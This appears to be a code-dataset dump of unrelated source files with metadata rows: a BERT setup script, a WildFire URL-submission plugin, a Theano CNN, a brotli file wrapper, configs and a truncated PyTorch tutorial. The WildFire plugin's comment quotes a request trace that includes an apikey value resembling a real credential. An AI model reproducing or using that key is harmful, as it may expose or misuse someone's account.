from io import open from setuptools import setup, find_packages # from pip.req import parse_requirements with open('requirements.txt') as f: install_requires = f.read().strip().split('\n') setup(name='fast_bert', version='1.4.2', description='AI Library using BERT', author='Kaushal Trivedi', author_email='kaushaltrivedi@me.com', license='Apache2', url='https://github.com/kaushaltrivedi/fast-bert', long_description=open("README.md", "r", encoding='utf-8').read(), long_description_content_type="text/markdown", keywords='BERT NLP deep learning google', packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]), install_requires=install_requires, classifiers=[ 'Intended Audience :: Science/Research', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python :: 3', 'Topic :: Scientific/Engineering :: Artificial Intelligence', ], zip_safe=False)
38.071429
71
0.63227
795ab6f67f74be07bd98ad828b074f51b1615205
3,021
py
Python
paloalto_wildfire/komand_paloalto_wildfire/actions/submit_url/action.py
killstrelok/insightconnect-plugins
911358925f4233ab273dbd8172e8b7b9188ebc01
[ "MIT" ]
null
null
null
paloalto_wildfire/komand_paloalto_wildfire/actions/submit_url/action.py
killstrelok/insightconnect-plugins
911358925f4233ab273dbd8172e8b7b9188ebc01
[ "MIT" ]
1
2021-02-23T23:57:37.000Z
2021-02-23T23:57:37.000Z
paloalto_wildfire/komand_paloalto_wildfire/actions/submit_url/action.py
killstrelok/insightconnect-plugins
911358925f4233ab273dbd8172e8b7b9188ebc01
[ "MIT" ]
null
null
null
import komand from .schema import SubmitUrlInput, SubmitUrlOutput # Custom imports below from komand.exceptions import PluginException import requests import xmltodict class SubmitUrl(komand.Action): def __init__(self): super(self.__class__, self).__init__( name='submit_url', description='Submit a URL for analysis', input=SubmitUrlInput(), output=SubmitUrlOutput()) def run(self, params={}): """TODO: Run action""" endpoint = "/publicapi/submit/link" client = self.connection.client url = 'https://{}{}'.format(self.connection.host, endpoint) # Formatted with None and tuples so requests sends form-data properly # => Send data, 299 bytes (0x12b) # 0000: --------------------------8557684369749613 # 002c: Content-Disposition: form-data; name="apikey" # 005b: # 005d: 740219c8fab2606b9206b2d40626b2d1 # 007f: --------------------------8557684369749613 # 00ab: Content-Disposition: form-data; name="format" # 00d8: # 00da: pdf # 00fd: --------------------------8557684369749613-- # ... req = { 'apikey': (None, self.connection.api_key), 'link': (None, params.get('url')), } try: r = requests.post(url, files=req) o = xmltodict.parse(r.content) out = dict(o) #self.logger.info(out) #{ # "submission": { # "error": { # "error-message": "'Invalid webpage type url, url should start with http or https'" # } # } #} if 'submission' in out: if 'error' in out['submission']: if 'error-message' in out['submission']['error']: error = out['submission']['error']['error-message'] raise PluginException(cause='Received an error response from Wildfire.', assistance=f'{error}.') # A different response occurs sometimes # {'error': OrderedDict([('error-message', "'Invalid webpage type url, url should start with http or https'")])} if 'error' in out: if 'error-message' in out['error']: error = out['error']['error-message'] raise PluginException(cause='Received an error response from Wildfire.', assistance=f'{error}.') else: self.logger.info(out) raise PluginException(cause='Received an error response from 
Wildfire.', assistance="Check the log output for more details.") out = dict(o['wildfire']['submit-link-info']) except: raise return { 'submission': out } def test(self): """TODO: Test action""" client = self.connection.client return { 'submission': { 'url': 'Test', 'sha256': 'Test', 'md5': 'Test' } }
37.296296
143
0.53095
795ab81608916bd29341868a2b5dd55c44969d26
239
py
Python
jython_ex.py
CenterLineM/PythonPon
ca6a29ec10b095684e90cfcfbf6e0ac1cb5eabe3
[ "Apache-2.0" ]
null
null
null
jython_ex.py
CenterLineM/PythonPon
ca6a29ec10b095684e90cfcfbf6e0ac1cb5eabe3
[ "Apache-2.0" ]
null
null
null
jython_ex.py
CenterLineM/PythonPon
ca6a29ec10b095684e90cfcfbf6e0ac1cb5eabe3
[ "Apache-2.0" ]
null
null
null
__author__ = 'Administrator' import java from java import awt def exit(e): java.lang.System.exit(0) frame = awt.Frame('AWT Example', visible=1) button = awt.Button('Close Me!', actionPerformed=exit) frame.add(button, 'Center') frame.pack()
29.875
54
0.74477
795ab837e6ce3690a93ee4bd0861128438c59bcb
388
py
Python
_tbnf/fable_modules/fable_library/task.py
thautwarm/Typed-BNF
897a4a2bd389dcb2ca16c6c773b28f0388336f63
[ "MIT" ]
38
2022-01-01T06:45:27.000Z
2022-03-20T14:18:38.000Z
_tbnf/fable_modules/fable_library/task.py
thautwarm/typed-bnf
b5694a34fe21a064250f2ef88745d8ebad51eb33
[ "MIT" ]
7
2021-09-17T16:46:50.000Z
2021-12-31T20:49:35.000Z
_tbnf/fable_modules/fable_library/task.py
thautwarm/typed-bnf
b5694a34fe21a064250f2ef88745d8ebad51eb33
[ "MIT" ]
3
2022-01-01T07:33:44.000Z
2022-01-09T11:41:33.000Z
from typing import Awaitable, TypeVar, Any import asyncio T = TypeVar("T") async def zero() -> None: return async def from_result(value: Any) -> Any: return value def get_awaiter(value: Awaitable[T]) -> Awaitable[T]: return value def get_result(value: Awaitable[T]) -> T: return asyncio.run(value) __all__ = ["get_awaiter", "get_result", "from_result", "zero"]
16.166667
62
0.677835
795ab990f2e60ef09bf1ab9b2edab34bc0866509
2,211
py
Python
tmp_cfg/cfgs_cityscapes_resnet101os16.py
zhizhangxian/sssegmentation
90613f6e0abf4cdd729cf382ab2a915e106d8649
[ "MIT" ]
1
2021-05-28T06:42:37.000Z
2021-05-28T06:42:37.000Z
tmp_cfg/cfgs_cityscapes_resnet101os16.py
zhizhangxian/sssegmentation
90613f6e0abf4cdd729cf382ab2a915e106d8649
[ "MIT" ]
null
null
null
tmp_cfg/cfgs_cityscapes_resnet101os16.py
zhizhangxian/sssegmentation
90613f6e0abf4cdd729cf382ab2a915e106d8649
[ "MIT" ]
null
null
null
'''define the config file for cityscapes and resnet101os16''' from .base_cfg import * # modify dataset config DATASET_CFG = DATASET_CFG.copy() DATASET_CFG['train'].update( { 'type': 'cityscapes', 'rootdir': 'data/CityScapes', 'aug_opts': [('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': (0.5, 2.0)}), ('RandomCrop', {'crop_size': (512, 1024), 'one_category_max_ratio': 0.75}), ('RandomFlip', {'flip_prob': 0.5}), ('PhotoMetricDistortion', {}), ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}), ('ToTensor', {}), ('Padding', {'output_size': (512, 1024), 'data_type': 'tensor'}),] } ) DATASET_CFG['test'].update( { 'type': 'cityscapes', 'rootdir': 'data/CityScapes', 'aug_opts': [('Resize', {'output_size': (2048, 1024), 'keep_ratio': True, 'scale_range': None}), ('Normalize', {'mean': [123.675, 116.28, 103.53], 'std': [58.395, 57.12, 57.375]}), ('ToTensor', {}),], } ) # modify dataloader config DATALOADER_CFG = DATALOADER_CFG.copy() DATALOADER_CFG['train'].update( { 'batch_size': 8, } ) # modify optimizer config OPTIMIZER_CFG = OPTIMIZER_CFG.copy() OPTIMIZER_CFG.update( { 'max_epochs': 220 } ) # modify losses config LOSSES_CFG = LOSSES_CFG.copy() # modify model config MODEL_CFG = MODEL_CFG.copy() MODEL_CFG.update( { 'num_classes': 19, } ) # modify inference config INFERENCE_CFG = INFERENCE_CFG.copy() # modify common config COMMON_CFG = COMMON_CFG.copy() COMMON_CFG['train'].update( { 'backupdir': 'deeplabv3plus_resnet101os16_cityscapes_train', 'logfilepath': 'deeplabv3plus_resnet101os16_cityscapes_train/train.log', } ) COMMON_CFG['test'].update( { 'backupdir': 'deeplabv3plus_resnet101os16_cityscapes_test', 'logfilepath': 'deeplabv3plus_resnet101os16_cityscapes_test/test.log', 'resultsavepath': 'deeplabv3plus_resnet101os16_cityscapes_test/deeplabv3plus_resnet101os16_cityscapes_results.pkl' } )
32.514706
122
0.606061
795ab99dc2cb92e9a86411e8a4d83a0965fa9e14
1,059
py
Python
google/ads/googleads/v6/services/services/user_interest_service/transports/__init__.py
wxxlouisa/google-ads-python
f24137966f6bfcb765a9b1fae79f2d23041825fe
[ "Apache-2.0" ]
null
null
null
google/ads/googleads/v6/services/services/user_interest_service/transports/__init__.py
wxxlouisa/google-ads-python
f24137966f6bfcb765a9b1fae79f2d23041825fe
[ "Apache-2.0" ]
null
null
null
google/ads/googleads/v6/services/services/user_interest_service/transports/__init__.py
wxxlouisa/google-ads-python
f24137966f6bfcb765a9b1fae79f2d23041825fe
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict from typing import Dict, Type from .base import UserInterestServiceTransport from .grpc import UserInterestServiceGrpcTransport # Compile a registry of transports. _transport_registry = ( OrderedDict() ) # type: Dict[str, Type[UserInterestServiceTransport]] _transport_registry["grpc"] = UserInterestServiceGrpcTransport __all__ = ( "UserInterestServiceTransport", "UserInterestServiceGrpcTransport", )
29.416667
74
0.769594
795ab9b13215165462200a7216b80f27410e936d
7,779
py
Python
cnn_conv_pool.py
MasazI/DeepLearning
f0658aeddab9517db67f3d36ae831c6fed62aae9
[ "MIT" ]
1
2018-08-30T06:42:30.000Z
2018-08-30T06:42:30.000Z
cnn_conv_pool.py
MasazI/DeepLearning
f0658aeddab9517db67f3d36ae831c6fed62aae9
[ "MIT" ]
null
null
null
cnn_conv_pool.py
MasazI/DeepLearning
f0658aeddab9517db67f3d36ae831c6fed62aae9
[ "MIT" ]
null
null
null
#coding: utf-8 import theano import theano.tensor as T from theano.tensor.nnet import conv from theano.tensor.signal import downsample from logistic_regression import load_data, LogisticRegression from multilayer_perceptron import HiddenLayer import function_util as func import numpy as np import timeit import os import sys # 畳込み層 class ConvLayer(object): def __init__(self, rng, input, image_shape, filter_shape): # 入力のチャンネル数とフィルタを定義するときに指定する入力のチャンネル数の一致を確認 assert image_shape[1] == filter_shape[1] # 入力の保存 self.input = input # 黒魔術的なfilterの初期化 # フィルターマップ数 * フィルターのheight * フィルターのwidth (prodはnpの配列要素全部の掛け算) fan_in = np.prod(filter_shape[1:]) # 出力特徴Map数 * フィルターのheight * フィルターのwidth fan_out = filter_shape[0] * np.prod(filter_shape[2:]) # filterの定義 W_bound = np.sqrt(6./ (fan_in + fan_out)) # ランダムな値を割り振る self.W = theano.shared(np.asarray(rng.uniform(low=-W_bound, high=W_bound, size=filter_shape), dtype=theano.config.floatX), borrow=True) # biasの定義 b_values = np.zeros((filter_shape[0],), dtype=theano.config.floatX) self.b = theano.shared(value=b_values, borrow=True) # conv conv_out = conv.conv2d(input=input, filters=self.W, filter_shape=filter_shape, image_shape=image_shape) # biasとactivate function # poolingの結果にbias項として加える(全項に追加) # biasは1dimのvectorなので(1, n_filters, 1, 1)にreshapeする # biasを加えたら、activate function(ここではtanh)を適用する self.output = func.sym_ReLU(conv_out + self.b.dimshuffle('x', 0, 'x', 'x')) # パラメータの保存 self.params = [self.W, self.b] # 入力の保存 self.input = input # プーリング層 class PoolLayer(object): def __init__(self, input, poolsize=(2,2)): # pooling self.input = input pooled_out = downsample.max_pool_2d(input=input, ds=poolsize, ignore_border=True) self.output = pooled_out def optimize_cnn_lenet(learning_rate=0.01, n_epochs=200, dataset='data/mnist.pkl.gz', batch_size=500, n_hidden=500, nkerns=[20, 50], rng=np.random.RandomState(23455)): print '... 
load training set' datasets = load_data(dataset) train_set_x, train_set_y = datasets[0] valid_set_x, valid_set_y = datasets[1] test_set_x, test_set_y = datasets[2] n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size # ミニバッチのindex index = T.lscalar() # dataシンボル x = T.matrix('x') # labelシンボル y = T.ivector('y') print '... building the model' # LeNetConvPoolLayerと矛盾が起きないように、(batch_size, 28*28)にラスタ化された行列を4DTensorにリシェイプする # 追加した1はチャンネル数 # ここではグレイスケール画像なのでチャンネル数は1 layer0_input = x.reshape((batch_size, 1, 28, 28)) # filterのnkerns[0]は20 layer0 = ConvLayer(rng, input=layer0_input, image_shape=(batch_size, 1, 28, 28), filter_shape=(nkerns[0], 1, 5, 5)) layer1 = PoolLayer(layer0.output, poolsize=(2, 2)) # filterのnkerns[1]は50 layer2 = ConvLayer(rng, input=layer1.output, image_shape=(batch_size, nkerns[0], 12, 12), filter_shape=(nkerns[1], nkerns[0], 5, 5)) layer3 = PoolLayer(layer2.output, poolsize=(2, 2)) # layer2_input # layer1の出力は4x4ピクセルの画像が50チャンネル分4次元Tensorで出力されるが、多層パーセプトロンの入力にそのまま使えない # 4x4x50=800次元のベクトルに変換する(batch_size, 50, 4, 4)から(batch_size, 800)にする layer4_input = layer3.output.flatten(2) # 500ユニットの隠れレイヤー # layer2_inputで作成した入力ベクトルのサイズ=n_in layer4 = HiddenLayer(rng, input=layer4_input, n_in=nkerns[1]*4*4, n_out=n_hidden, activation=T.tanh) # 出力は500ユニット layer5 = LogisticRegression(input=layer4.output, n_in=n_hidden, n_out=10) # cost(普通の多層パーセプトロンは正則化項が必要だが、CNNは構造自体で正則化の効果を含んでいる) cost = layer5.negative_log_likelihood(y) # testモデル # 入力indexからgivensによって計算した値を使ってlayer3.errorsを計算する test_model = theano.function([index], layer5.errors(y), givens={x:test_set_x[index*batch_size : (index + 1)*batch_size], y: test_set_y[index*batch_size : (index + 1)*batch_size]}) # validationモデル validate_model = theano.function([index], layer5.errors(y), givens={x:valid_set_x[index*batch_size : (index + 1)*batch_size], y: 
valid_set_y[index*batch_size : (index + 1)*batch_size]}) # 微分用のパラメータ(pooling層にはパラメータがない) params = layer5.params + layer4.params + layer2.params + layer0.params # コスト関数パラメータについてのの微分 grads = T.grad(cost, params) # パラメータの更新 updates = [(param_i, param_i - learning_rate * grad_i) for param_i, grad_i in zip(params, grads)] # trainモデル train_model = theano.function(inputs=[index], outputs=cost, updates=updates, givens={x: train_set_x[index*batch_size : (index + 1)*batch_size], y:train_set_y[index*batch_size : (index+1)*batch_size]}) # optimize print "train model ..." patience = 10000 patience_increase = 2 improvement_threshold = 0.995 validation_frequency = min(n_train_batches, patience/2) best_validation_loss = np.inf best_iter = 0 test_score = 0 start_time = timeit.default_timer() epoch = 0 done_looping = False fp1 = open('log/lenet_validation_error.txt', 'w') fp2 = open('log/lenet_test_error.txt', 'w') while(epoch < n_epochs) and (not done_looping): epoch = epoch + 1 for minibatch_index in xrange(n_train_batches): minibatch_avg_cost = train_model(minibatch_index) iter = (epoch - 1) * n_train_batches + minibatch_index if (iter + 1) % validation_frequency == 0: ## validationのindexをvalidationのエラー率を計算するfunctionに渡し、配列としてかえす validation_losses = [validate_model(i) for i in xrange(n_valid_batches)] # 平均してscoreにする this_validation_loss = np.mean(validation_losses) print('epoch %i, minibatch %i/%i, validation error %f ' % (epoch, minibatch_index+1, n_train_batches, this_validation_loss*100.)) fp1.write("%d\t%f\n" % (epoch, this_validation_loss*100)) if this_validation_loss < best_validation_loss: if(this_validation_loss < best_validation_loss * improvement_threshold): patience = max(patience, iter*patience_increase) best_validation_loss = this_validation_loss best_iter = iter ## testのindex をtestのエラー率を計算するfunctionに渡し、配列として渡す test_losses = [test_model(i) for i in xrange(n_test_batches)] ## 平均してscoreにする test_score = np.mean(test_losses) ## print('epoch %i, minibatch %i/%i, test error 
%f ' % (epoch, minibatch_index+1, n_train_batches, test_score*100.)) fp2.write("%d\t%f\n" % (epoch, test_score*100)) if patience <= iter: done_looping = True break fp1.close() fp2.close() end_time = timeit.default_timer() print(('optimization complete. Best validation score of %f obtained at iteration %i, with test performance %f') % (best_validation_loss * 100., best_iter + 1, test_score * 100.)) print >> sys.stderr,('This code for file ' + os.path.split(__file__)[1] + ' ran for %.2fm' % ((end_time - start_time)/60.)) import cPickle cPickle.dump(layer0, open("model/cnn_layer0.pkl", "wb")) cPickle.dump(layer2, open("model/cnn_layer2.pkl", "wb")) cPickle.dump(layer4, open("model/cnn_layer4.pkl", "wb")) cPickle.dump(layer5, open("model/cnn_layer5.pkl", "wb")) if __name__ == '__main__': optimize_cnn_lenet()
39.287879
204
0.662296
795abb3ab0475b8728bd43026538a2409edb8b5b
10,876
py
Python
brotli_file.py
youknowone/brotli-file
dd65e8cc15a0799dd19bd870658246ec666e2107
[ "BSD-2-Clause-FreeBSD" ]
5
2020-08-02T05:40:25.000Z
2022-03-27T18:17:20.000Z
brotli_file.py
youknowone/brotli-file
dd65e8cc15a0799dd19bd870658246ec666e2107
[ "BSD-2-Clause-FreeBSD" ]
2
2020-08-02T05:40:13.000Z
2020-08-02T05:48:16.000Z
brotli_file.py
youknowone/brotli-file
dd65e8cc15a0799dd19bd870658246ec666e2107
[ "BSD-2-Clause-FreeBSD" ]
1
2020-08-21T02:14:26.000Z
2020-08-21T02:14:26.000Z
"""Functions that read and write brotli files. The user of the file doesn't have to worry about the compression, but random access is not allowed.""" # forked from CPython 3.8.1 gzip.py which is # based on Andrew Kuchling's minigzip.py distributed with the zlib module import os import io import _compression __all__ = ["BrotliFile", "open"] READ, WRITE = 1, 2 builtins_open = open def open(filename, mode="rb", quality=11, lgwin=22, lgblock=0, encoding=None, errors=None, newline=None): """Open a brotli-compressed file in binary or text mode. The filename argument can be an actual filename (a str or bytes object), or an existing file object to read from or write to. The mode argument can be "r", "rb", "w", "wb", "x", "xb", "a" or "ab" for binary mode, or "rt", "wt", "xt" or "at" for text mode. The default mode is "rb", and the default compresslevel is 9. For binary mode, this function is equivalent to the BrotliFile constructor: BrotliFile(filename, mode, compresslevel). In this case, the encoding, errors and newline arguments must not be provided. For text mode, a BrotliFile object is created, and wrapped in an io.TextIOWrapper instance with the specified encoding, error handling behavior, and line ending(s). 
""" if "t" in mode: if "b" in mode: raise ValueError("Invalid mode: %r" % (mode,)) else: if encoding is not None: raise ValueError("Argument 'encoding' not supported in binary mode") if errors is not None: raise ValueError("Argument 'errors' not supported in binary mode") if newline is not None: raise ValueError("Argument 'newline' not supported in binary mode") gz_mode = mode.replace("t", "") if isinstance(filename, (str, bytes, os.PathLike)): binary_file = BrotliFile(filename, gz_mode, quality, lgwin, lgblock) elif hasattr(filename, "read") or hasattr(filename, "write"): binary_file = BrotliFile( None, gz_mode, quality, lgwin, lgblock, filename) else: raise TypeError("filename must be a str or bytes object, or a file") if "t" in mode: return io.TextIOWrapper(binary_file, encoding, errors, newline) else: return binary_file class BrotliFile(_compression.BaseStream): """The BrotliFile class simulates most of the methods of a file object with the exception of the truncate() method. This class only supports opening files in binary mode. If you need to open a compressed file in text mode, use the brotli.open() function. """ # Overridden with internal file object to be closed, if only a filename # is passed in myfileobj = None def __init__(self, filename=None, mode=None, quality=11, lgwin=22, lgblock=0, fileobj=None): """Constructor for the BrotliFile class. At least one of fileobj and filename must be given a non-trivial value. The new class instance is based on fileobj, which can be a regular file, an io.BytesIO object, or any other object which simulates a file. It defaults to None, in which case filename is opened to provide a file object. The mode argument can be any of 'r', 'rb', 'a', 'ab', 'w', 'wb', 'x', or 'xb' depending on whether the file will be read or written. The default is the mode of fileobj if discernible; otherwise, the default is 'rb'. A mode of 'r' is equivalent to one of 'rb', and similarly for 'w' and 'wb', 'a' and 'ab', and 'x' and 'xb'. 
""" if mode and ('t' in mode or 'U' in mode): raise ValueError("Invalid mode: {!r}".format(mode)) if mode and 'b' not in mode: mode += 'b' if fileobj is None: fileobj = self.myfileobj = builtins_open(filename, mode or 'rb') if filename is None: filename = getattr(fileobj, 'name', '') if not isinstance(filename, (str, bytes)): filename = '' else: filename = os.fspath(filename) if mode is None: mode = getattr(fileobj, 'mode', 'rb') if mode.startswith('r'): self.mode = READ raw = _BrotliReader(fileobj, _BrotliDecompressor) self._buffer = io.BufferedReader(raw) self.name = filename elif mode.startswith(('w', 'a', 'x')): import brotli self.mode = WRITE self.size = 0 self.offset = 0 self.name = filename self.compress = brotli.Compressor( quality=quality, lgwin=lgwin, lgblock=lgblock) else: raise ValueError("Invalid mode: {!r}".format(mode)) self.fileobj = fileobj @property def mtime(self): """Last modification time read from stream, or None""" return self._buffer.raw._last_mtime def __repr__(self): s = repr(self.fileobj) return '<brotli ' + s[1:-1] + ' ' + hex(id(self)) + '>' def write(self, data): self._check_not_closed() if self.mode != WRITE: import errno raise OSError(errno.EBADF, "write() on read-only BrotliFile object") if self.fileobj is None: raise ValueError("write() on closed BrotliFile object") if isinstance(data, bytes): length = len(data) else: # accept any data that supports the buffer protocol data = memoryview(data) length = data.nbytes if length > 0: self.fileobj.write(self.compress.process(data)) self.size += length self.offset += length return length def read(self, size=-1): self._check_not_closed() if self.mode != READ: import errno raise OSError(errno.EBADF, "read() on write-only BrotliFile object") return self._buffer.read(size) def read1(self, size=-1): """Implements BufferedIOBase.read1() Reads up to a buffer's worth of data if size is negative.""" self._check_not_closed() if self.mode != READ: import errno raise OSError(errno.EBADF, "read1() on 
write-only BrotliFile object") if size < 0: size = io.DEFAULT_BUFFER_SIZE return self._buffer.read1(size) def peek(self, n): self._check_not_closed() if self.mode != READ: import errno raise OSError(errno.EBADF, "peek() on write-only BrotliFile object") return self._buffer.peek(n) @property def closed(self): return self.fileobj is None def close(self): fileobj = self.fileobj if fileobj is None: return self.fileobj = None try: if self.mode == WRITE: fileobj.write(self.compress.flush()) fileobj.write(self.compress.finish()) elif self.mode == READ: self._buffer.close() finally: myfileobj = self.myfileobj if myfileobj: self.myfileobj = None myfileobj.close() def flush(self): self._check_not_closed() if self.mode == WRITE: # Ensure the compressor's buffer is flushed self.fileobj.write(self.compress.flush()) self.fileobj.flush() def fileno(self): """Invoke the underlying file object's fileno() method. This will raise AttributeError if the underlying file object doesn't support fileno(). """ return self.fileobj.fileno() def rewind(self): '''Return the uncompressed stream file position indicator to the beginning of the file''' if self.mode != READ: raise OSError("Can't rewind in write mode") self._buffer.seek(0) def readable(self): return self.mode == READ def writable(self): return self.mode == WRITE def seekable(self): return True def seek(self, offset, whence=io.SEEK_SET): if self.mode == WRITE: if whence != io.SEEK_SET: if whence == io.SEEK_CUR: offset = self.offset + offset else: raise ValueError('Seek from end not supported') if offset < self.offset: raise OSError('Negative seek in write mode') count = offset - self.offset chunk = b'\0' * 1024 for i in range(count // 1024): self.write(chunk) self.write(b'\0' * (count % 1024)) elif self.mode == READ: self._check_not_closed() return self._buffer.seek(offset, whence) return self.offset def readline(self, size=-1): self._check_not_closed() return self._buffer.readline(size) class _BrotliDecompressor: eof = False def 
__init__(self): import brotli self.decompressor = brotli.Decompressor() self.needs_input = True self._buffer = bytearray(1) self._bufview = memoryview(self._buffer) self._buflen = len(self._buffer) self._pos = 0 def _check_buffer(self, new_len): if self._buflen < new_len: new_len = max(self._buflen, new_len) del self._bufview self._buffer.extend(b'\0' * (new_len * 2)) self._bufview = memoryview(self._buffer) self._buflen = len(self._buffer) def decompress(self, raw, size): if raw: uncompress = self.decompressor.process(raw) new_len = len(uncompress) self.needs_input = False else: uncompress = b'' new_len = 0 if self._pos >= size: r = bytes(self._bufview[:size]) pos = self._pos - size self._check_buffer(pos + new_len) self._bufview[:pos] = self._bufview[size:self._pos] self._bufview[pos:pos + new_len] = uncompress self._pos = pos + new_len elif self._pos + new_len >= size: used_len = size - self._pos r = bytes(self._bufview[:self._pos]) + uncompress[:used_len] rem_len = new_len - used_len self._check_buffer(rem_len) self._bufview[:rem_len] = uncompress[used_len:] self._pos = rem_len else: r = bytes(self._bufview[:self._pos]) + uncompress self._pos = 0 self.needs_input = True return r class _BrotliReader(_compression.DecompressReader): def read(self, size=-1): try: return super(_BrotliReader, self).read(size) except EOFError: return b''
33.361963
81
0.586797
795abb6bd7d79a2a847a69277c80bbb662a022d6
1,286
py
Python
app/extract_texts.py
sy-app/ll-now-extract-words
6c3b49330741a8661b613990082ec99e6e595cd5
[ "MIT" ]
1
2021-11-24T10:42:40.000Z
2021-11-24T10:42:40.000Z
app/extract_texts.py
sy-app/ll-now-extract-words
6c3b49330741a8661b613990082ec99e6e595cd5
[ "MIT" ]
7
2022-02-08T07:58:24.000Z
2022-03-27T08:15:51.000Z
app/extract_texts.py
sy-app/ll-now-extract-words
6c3b49330741a8661b613990082ec99e6e595cd5
[ "MIT" ]
null
null
null
import re import boto3 import unicodedata def extract_texts(tweets): # 除去する単語をDynamoDBから取得 table = boto3.resource('dynamodb').Table('ll_now') primary_key = {"primary": 'remove_word'} res = table.get_item(Key=primary_key) remove_words = res['Item']['word'] remove_words_pattern = '|'.join(remove_words) texts = [] for tweet in tweets: text = tweet['text'] hashtags = ['#' + ht['text'] for ht in tweet['entities']['hashtags']] # 自身を包含する別のハッシュタグの一部を除去しないようにソート hashtags.sort(key=len, reverse=True) # ハッシュタグを除去 if hashtags: hashtags_pattern = '|'.join(hashtags) text = re.sub(hashtags_pattern, ' ', text) # URLを除去 text = re.sub(r'https?://[\w/:%#\$&\?\(\)~\.=\+\-…]+', ' ', text) # 改行を除去 # text=re.sub('\n', ' ', text) # Unicode正規化 text = unicodedata.normalize('NFKC', text) # 半角のシングルクォーテーションを全角に変換 text = re.sub(r"'", "’", text) # 絵文字などを除去 text = re.sub(r'[^,.、。!?ー〜0-9a-zA-Zぁ-んァ-ヶ亜-腕纊-黑一-鿕・Α-ω’]', ' ', text) # 不要な単語を除去 text = re.sub(remove_words_pattern, '', text) # ツイートを跨いでコロケーション判定されないように末尾にターミネータを付加 text += ' eotw' texts.append(text) return texts
29.227273
77
0.557543
795abbd63e797f9ef9075891edcc5307ce12b9e0
11,133
py
Python
beginner_source/transfer_learning_tutorial.py
jakec888/tutorials
94cb6a3635b9b5ccb8a59c5346addba6901cd15d
[ "BSD-3-Clause" ]
1
2020-06-07T02:30:10.000Z
2020-06-07T02:30:10.000Z
beginner_source/transfer_learning_tutorial.py
pietern/tutorials
e0791cff1502df01719fb6cb29e817021c877d0e
[ "BSD-3-Clause" ]
null
null
null
beginner_source/transfer_learning_tutorial.py
pietern/tutorials
e0791cff1502df01719fb6cb29e817021c877d0e
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- """ Transfer Learning Tutorial ========================== **Author**: `Sasank Chilamkurthy <https://chsasank.github.io>`_ In this tutorial, you will learn how to train your network using transfer learning. You can read more about the transfer learning at `cs231n notes <https://cs231n.github.io/transfer-learning/>`__ Quoting these notes, In practice, very few people train an entire Convolutional Network from scratch (with random initialization), because it is relatively rare to have a dataset of sufficient size. Instead, it is common to pretrain a ConvNet on a very large dataset (e.g. ImageNet, which contains 1.2 million images with 1000 categories), and then use the ConvNet either as an initialization or a fixed feature extractor for the task of interest. These two major transfer learning scenarios look as follows: - **Finetuning the convnet**: Instead of random initializaion, we initialize the network with a pretrained network, like the one that is trained on imagenet 1000 dataset. Rest of the training looks as usual. - **ConvNet as fixed feature extractor**: Here, we will freeze the weights for all of the network except that of the final fully connected layer. This last fully connected layer is replaced with a new one with random weights and only this layer is trained. """ # License: BSD # Author: Sasank Chilamkurthy from __future__ import print_function, division import torch import torch.nn as nn import torch.optim as optim from torch.optim import lr_scheduler import numpy as np import torchvision from torchvision import datasets, models, transforms import matplotlib.pyplot as plt import time import os import copy plt.ion() # interactive mode ###################################################################### # Load Data # --------- # # We will use torchvision and torch.utils.data packages for loading the # data. # # The problem we're going to solve today is to train a model to classify # **ants** and **bees**. 
We have about 120 training images each for ants and bees. # There are 75 validation images for each class. Usually, this is a very # small dataset to generalize upon, if trained from scratch. Since we # are using transfer learning, we should be able to generalize reasonably # well. # # This dataset is a very small subset of imagenet. # # .. Note :: # Download the data from # `here <https://download.pytorch.org/tutorial/hymenoptera_data.zip>`_ # and extract it to the current directory. # Data augmentation and normalization for training # Just normalization for validation data_transforms = { 'train': transforms.Compose([ transforms.RandomResizedCrop(224), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]), 'val': transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]), } data_dir = 'data/hymenoptera_data' image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4, shuffle=True, num_workers=4) for x in ['train', 'val']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']} class_names = image_datasets['train'].classes device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") ###################################################################### # Visualize a few images # ^^^^^^^^^^^^^^^^^^^^^^ # Let's visualize a few training images so as to understand the data # augmentations. 
def imshow(inp, title=None):
    """Display a normalized (C, H, W) image tensor with matplotlib.

    Args:
        inp: image tensor as produced by the dataloader / make_grid;
            assumed normalized with the ImageNet mean/std used above.
        title: optional plot title.
    """
    inp = inp.numpy().transpose((1, 2, 0))  # CHW -> HWC for matplotlib
    mean = np.array([0.485, 0.456, 0.406])
    std = np.array([0.229, 0.224, 0.225])
    inp = std * inp + mean  # undo the Normalize transform
    inp = np.clip(inp, 0, 1)
    plt.imshow(inp)
    if title is not None:
        plt.title(title)
    plt.pause(0.001)  # pause a bit so that plots are updated


# Get a batch of training data
inputs, classes = next(iter(dataloaders['train']))

# Make a grid from batch
out = torchvision.utils.make_grid(inputs)

imshow(out, title=[class_names[x] for x in classes])


######################################################################
# Training the model
# ------------------
#
# Now, let's write a general function to train a model. Here, we will
# illustrate:
#
# -  Scheduling the learning rate
# -  Saving the best model
#
# In the following, parameter ``scheduler`` is an LR scheduler object from
# ``torch.optim.lr_scheduler``.


def train_model(model, criterion, optimizer, scheduler, num_epochs=25):
    """Train ``model`` and return it loaded with the best validation weights.

    Args:
